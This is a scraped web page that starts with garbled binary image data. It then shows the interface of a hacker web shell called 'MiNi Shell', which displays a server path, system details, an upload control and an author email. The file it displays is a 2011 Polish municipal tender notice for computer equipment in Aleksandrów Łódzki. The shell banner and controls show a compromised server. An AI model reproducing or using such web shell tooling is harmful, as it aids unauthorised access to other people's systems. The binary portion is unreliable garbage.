JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110512/136467-N-2011.html

<p class="kh_header"><b>Aleksandrów Łódzki: Dostawa 3 stacji roboczych, 3 monitorów, 1 urządzenia wielofunkcyjnego oraz 1 notebooka dla Urzędu Miejskiego w Aleksandrowie Łódzkim - Jednostki Realizującej Projekt pn: Kompleksowe rozwiązanie gospodarki ściekowej na terenie Gminy Aleksandrów Łódzki</b><br>
<b>Numer ogłoszenia: 136467 - 2011; data zamieszczenia: 12.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Aleksandrów Łódzki , Pl. Kościuszki 2, 95-070 Aleksandrów Łódzki, woj. łódzkie, tel. 042 7121018, 7121620, faks 042 7121780.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.aleksandrow-lodzki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa 3 stacji roboczych, 3 monitorów, 1 urządzenia wielofunkcyjnego oraz 1 notebooka dla Urzędu Miejskiego w Aleksandrowie Łódzkim - Jednostki Realizującej Projekt pn: Kompleksowe rozwiązanie gospodarki ściekowej na terenie Gminy Aleksandrów Łódzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest dostawa 3 stacji roboczych, 3 monitorów, 1 urządzenia wielofunkcyjnego oraz 1 notebooka  dla Urzędu Miejskiego w Aleksandrowie Łódzkim - Jednostki Realizującej Projekt pn Kompleksowe rozwiązanie gospodarki ściekowej na terenie Gminy Aleksandrów Łódzki o następujących parametrach

1.	Stacja robocza 

Obudowa
Mini Tower
Procesor
Liczba rdzeni: 4
Częstotliwość taktowania: 3,3 GHz
Liczba wątków: 4
Pamięć podręczna L2: 6MB 
Maksymalna przepustowość pamięci: 21 GB s
Pamięć systemowa
4GB, DDR3, 1333 MHz, możliwość rozbudowy do 16GB
Częstotliwość szyny QPI DMI
5 GT s
Dysk twardy
1 TB, SATA II, 3.0 Gb s NCQ
Chipset
producenta procesora
Karta graficzna
1024 MB  DDR5 zainstalowanej pamięci
Napęd optyczny 
DVD?RW Super Multi (+ DVD-RAM) Dual Layer

Karta dźwiękowa
Zintegrowana
Karta sieciowa
Zintegrowana 10 100 1000 Mbit s
Bezprzewodowa karta sieciowa
TAK
Interfejsy
 1 x 15-stykowe D-Sub (wyjście na monitor)
 1 x HDMI
 8 x USB 2.0
 1 x RJ-45 (LAN)
 1 x eSATA
 1 x wyjście słuchawkowe (na froncie obudowy)
 1 x wejście na mikrofon (na froncie obudowy)
 1 x wejście liniowe
 1 x wyjście liniowe
 1 x wejście na mikrofon
 1 x wyjście optyczne SPDIF
Gniazda rozszerzeń
PCIe x3: 3 gniazda
PCIe x16 karta graficzna: 1 gniazdo
Kieszenie 9 cm 3,5: 3 1 zewnętrzna, 2 wewnętrzne na dodatkowe dyski twarde
Kieszenie 13 cm 5,25: 2 na dodatkowe napędy optyczne
Zasilacz
Minimum 350W 230V
Dodatkowe wyposażenie
mysz, klawiatura trwale oznaczone logo producenta
Czytnik kart pamięci
tak
Gwarancja
36 miesięcy producenta
System operacyjny
Oryginalny, w polskiej wersji językowej, 64 bitowy system operacyjny w wersji profesjonalnej umożliwiającej podłączenie do domeny Windows 2003.
Oprogramowanie biurowe
Kompleksowy pakiet oprogramowania biurowego w wersji standardowej na rok 2010 - licencja dla małych firm.
Pakiet ten zawiera: wszechstronne narzędzia poczty e-mail i planowania, zaawansowane funkcje zarządzania
informacjami i danymi w arkuszu kalkulacyjnym, a także profesjonalne narzędzia marketingowe w programie do
obróbki grafiki.

Edytor tekstu o następujących funkcjonalności
- pozwala na rozbudowane formatowanie akapitów, tworzenie rozdziałów, spisów treści, przypisów i komentarzy,
- umożliwia pracę grupową przez sieć lokalną lub internet i śledzenie wprowadzanych zmian,
- obsługuje pliki multimedialne, ClipArty, pozwala na korzystanie z szablonów dokumentów, sprawdzanie pisowni lub słowników wyrazów bliskoznacznych,
Arkusz kalkulacyjny o następujących funkcjonalności
- umożliwia wpisywanie danych liczbowych lub wartości do komórek i wykonywanie zaawansowanych operacji,
- dzięki wbudowanym w arkusz funkcjom nawet przeciętny użytkownik jest w stanie przeprowadzić profesjonalne analizy finansowe. Wszystko można drukować, zapisywać, publikować i wysyłać,
Program do grafiki prezentacyjnej o następujących funkcjonalności
- zawiera intuicyjny interfejs do tworzenia poszczególnych slajdów pokazu,
- funkcja emisji pokazu slajdów, umożliwiająca łatwe udostępnianie pokazu innym użytkownikom
Program klient poczty elektronicznej, kalendarz i organizer a także czytnik RSS i platforma współpracy
korporacyjnej. z serwerem Exchange a także może obsługiwać fax o następującej funkcjonalności
- pozwala na filtrowanie, tagowanie i wyszukiwanie wiadomości. Dynamiczny folder wyszukiwania pozwala na łatwy dostęp do najistotniejszych informacji,
- posiada obsługę poczty, kalendarz z terminarzem, listę kontaktów synchronizowaną online, listę zadań, notatnik czy dziennik,
- opcje tworzenia reguł i automatyzacja zadań nie mają sobie równych.
Program do tworzenia, personalizowania i udostępniania różnego rodzaju profesjonalnych publikacji
oraz materiałów marketingowych.
 - narzędzia do edycji zdjęć, umożliwiające kadrowanie
- powiększanie oraz przycinanie obrazów i symboli zastępczych obrazów, ułatwiają zamienianie obrazów z zachowaniem układu strony,
Wersja językowa - pełna polska
Nośnik - wersja elektroniczna + klucz
Instrukcja w języku polskim w wersji elektronicznej

2.	Monitor LCD 
Ekran
24 cale, format 16:9
Wielkość plamki pion. x poz.
0.2715 x 0.2715 mm
Fizyczna rozdzielczość
Full HD 1080p, 1920 x 1080  2.1 megapiksela
Czas reakcji matrycy
2 ms
Kontrast  naturalny
70000:1 ACR
Jasność
300 cd m2 typowa, 400 cd m2 maksymalna
Częstotliwość pozioma
30 - 81 KHz
Częstotliwość pionowa
56 - 75 Hz
Kąty widzenia
poziomo pionowo: 170° 160°;
prawo lewo: 85° 85°; góra dół: 80° 80°
Gniazda wejściowe    
HDMI, DVI-D, D-Sub, Audio
Głośniki
Stereo 2 x 3 W
Certyfikaty
CE
Gwarancja
36 miesięcy producenta

3. Urządzenie wielofunkcyjne  laserowe
Typ: 
monochromatyczna
Funkcje: 
- drukowanie
- skanowanie
- kopiowanie
Format papieru
A4
Prędkość druku
28 str. min
Rozdzielczość drukowania: 
2400 x 600 dpi
Pamięc RAM
64 MB z możliwością rozbudowy do 320MB
Maksymalne obciążenie miesięczne
do 50 000 stron miesiąc
Czas pierwszego wydruku
poniżej 6 sekund	
Czas rozgrzewania
nie dłużej niż 25 sekund z trybu oszczędzania energii
Język drukarki:
PCL5e, PCL6, SIDM

Dupleks w druku
Tak
Rozdzielczość skanowania
do 4800dpi
Skanowanie do
FTP, E-mail, TWAIN, CIFS
Szybkość skanowania
do 21 str. min w czerni, do 10 str. min w kolorze
Podawanie dokumentów
50-arkuszowy automatyczny podajnik dokumentów ADF
Formaty zeskanowanych plików
PDF, TIFF, JPEG
Szybkość kopiowania
28 kopii min
Czas wykonania pierwszej kopii
15 sekund
Interfejs: 
Połączenia Dwukierunkowe równoległe IEEE1284, USB 2.0 o dużej szybkości, Ethernet 10 100BaseTX
Gwarancja: 
36 miesięcy producenta, gwarancja on-site, naprawa u klienta w ciągu 24h

4. Notebook 

Ekran
LCD, 17,3 cala z powłoką antyodblaskową
Natywna rozdzielczość
1600 x 900
Procesor
Liczba rdzeni: 2
Częstotliwość taktowania: 2,66 GHz
Liczba wątków: 4
Pamięć podręczna L2: 3MB 
Maksymalna przepustowość pamięci: 17,1 GB s
Częstotliwość szyny QPI DMI
2,5 GT s
Pamięć systemowa
4096 MB, DDR3, 1066 MHz
Dysk twardy
500 GB, 7200 obr. min chroniony za pomocą czujnika upadku
Karta graficzna
1024 MB zainstalowanej pamięci
Wbudowany napęd optyczny 
DVD?RW Super Multi + DVD-RAM Dual Layer
Karta dźwiękowa
zintegrowana
Głośniki
2 wbudowane głośniki stereo (2 x 2 W)
Karta sieciowa
1x10 100  1000BaseT Gigabitethernet RJ45
karta sieciowa bezprzewodowa
IEEE 802.11n
Bluetooth
wbudowany
Mikrofon
wbudowany
Kamera
Wbudowana o rozdzielczości 2,0 mln pikseli
Czytnik linii papilarnych
wbudowany
Interfejsy36
1x 15-stykowe D-Sub wyjście na monitor
 1 x HDMI 4x USB 2.0
1x RJ-45 LAN
 1x E-SATA USB Combo
 1x FireWire IEEE1394
Wyjście słuchawkowe
wejście na mikrofon
wejście zasilania DC-in
Typ gniazda rozszerzeń
Express Card 34
Rodzaj baterii
Li-Ion, czas pracy na baterii ponad 4 godziny
Czytnik kart pamięci i rodzaje odczytywanych kart
 SecureDigital Card
 MultiMedia Card
 MemoryStick
 MemoryStick Pro
 MemoryStick Duo
 MemoryStick Pro Duo
 xD-Picture Card
Gwarancja
36 miesięcy producenta, gwarancja on-site, naprawa u klienta w następny dzień roboczy
System operacyjny
Oryginalny, w polskiej wersji językowej, 64 bitowy system operacyjny w wersji profesjonalnej umożliwiającej podłączenie do domeny Windows 2003.

Oprogramowanie biurowe
Kompleksowy pakiet oprogramowania biurowego w wersji standardowej na rok 2010 - licencja dla małych firm.
Pakiet ten zawiera: wszechstronne narzędzia poczty e-mail i planowania, zaawansowane funkcje zarządzania
informacjami i danymi w arkuszu kalkulacyjnym, a także profesjonalne narzędzia marketingowe w programie do
obróbki grafiki.
Edytor tekstu o następujących funkcjonalności
- pozwala na rozbudowane formatowanie akapitów, tworzenie rozdziałów, spisów treści, przypisów i komentarzy,
- umożliwia pracę grupową przez sieć lokalną lub internet i śledzenie wprowadzanych zmian,
- obsługuje pliki multimedialne, ClipArty, pozwala na korzystanie z szablonów dokumentów, sprawdzanie pisowni lub słowników wyrazów bliskoznacznych,
Arkusz kalkulacyjny o następujących funkcjonalności
- umożliwia wpisywanie danych liczbowych lub wartości do komórek i wykonywanie zaawansowanych operacji,
- dzięki wbudowanym w arkusz funkcjom nawet przeciętny użytkownik jest w stanie przeprowadzić profesjonalne analizy finansowe. Wszystko można drukować, zapisywać, publikować i wysyłać,
Program do grafiki prezentacyjnej o następujących funkcjonalności
- zawiera intuicyjny interfejs do tworzenia poszczególnych slajdów pokazu,
- funkcja emisji pokazu slajdów, umożliwiająca łatwe udostępnianie pokazu innym użytkownikom
Program klient poczty elektronicznej, kalendarz i organizer a także czytnik RSS i platforma współpracy
korporacyjnej. z serwerem Exchange a także może obsługiwać fax o następującej funkcjonalności
- pozwala na filtrowanie, tagowanie i wyszukiwanie wiadomości. Dynamiczny folder wyszukiwania pozwala na łatwy dostęp do najistotniejszych informacji,
- posiada obsługę poczty, kalendarz z terminarzem, listę kontaktów synchronizowaną online, listę zadań, notatnik czy dziennik,
- opcje tworzenia reguł i automatyzacja zadań nie mają sobie równych.
Program do tworzenia, personalizowania i udostępniania różnego rodzaju profesjonalnych publikacji
oraz materiałów marketingowych.
 - narzędzia do edycji zdjęć, umożliwiające kadrowanie
- powiększanie oraz przycinanie obrazów i symboli zastępczych obrazów, ułatwiają zamienianie obrazów z zachowaniem układu strony,
Wersja językowa - pełna polska
Nośnik  wersja elektroniczna + klucz
Instrukcja w języku polskim w wersji elektronicznej.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.21.40.00-2, 33.19.51.00-4, 30.21.31.00-6, 30.12.13.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 u.p.z.p.- wg. zał nr 2 do siwz 
       W przypadku oferty składanej przez wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, oświadczenie o spełnianiu każdego z warunków, o których mowa w art. 22 ust. 1 składa co najmniej jeden z tych wykonawców albo wszyscy ci wykonawcy wspólnie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 u.p.z.p.- wg. zał nr 2 do siwz 
       W przypadku oferty składanej przez wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, oświadczenie o spełnianiu każdego z warunków, o których mowa w art. 22 ust. 1 składa co najmniej jeden z tych wykonawców albo wszyscy ci wykonawcy wspólnie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 u.p.z.p.- wg. zał nr 2 do siwz 
       W przypadku oferty składanej przez wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, oświadczenie o spełnianiu każdego z warunków, o których mowa w art. 22 ust. 1 składa co najmniej jeden z tych wykonawców albo wszyscy ci wykonawcy wspólnie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 u.p.z.p.- wg. zał nr 2 do siwz 
       W przypadku oferty składanej przez wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, oświadczenie o spełnianiu każdego z warunków, o których mowa w art. 22 ust. 1 składa co najmniej jeden z tych wykonawców albo wszyscy ci wykonawcy wspólnie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 u.p.z.p.- wg. zał nr 2 do siwz 
       W przypadku oferty składanej przez wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, oświadczenie o spełnianiu każdego z warunków, o których mowa w art. 22 ust. 1 składa co najmniej jeden z tych wykonawców albo wszyscy ci wykonawcy wspólnie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W stosunku do wykonawców zagranicznych zastosowanie maja przepisy   rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U  nr 226 pozycja 1817 ze. zm.).
Jeżeli dokumenty sporządzone są w języku obcym, to należy składać  je   wraz  z tłumaczeniem na język polski poświadczonym przez Wykonawcę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.aleksandrow-lodzki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Aleksandrowie Łódzki, Plac Kościuszki 2, kod pocztowy 95-070, bud. C pokój nr 14a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.05.2011 godzina 11:00, miejsce: Urząd Miejski w Aleksandrowie Łódzki, Plac Kościuszki 2, kod pocztowy 95-070, bud. B, punkt podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zakup w ramach Projektu Kompleksowe rozwiązanie gospodarki ściekowej na terenie gminy Aleksandrów Łódzki - nr POIS 01.01.00.00-170 09.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com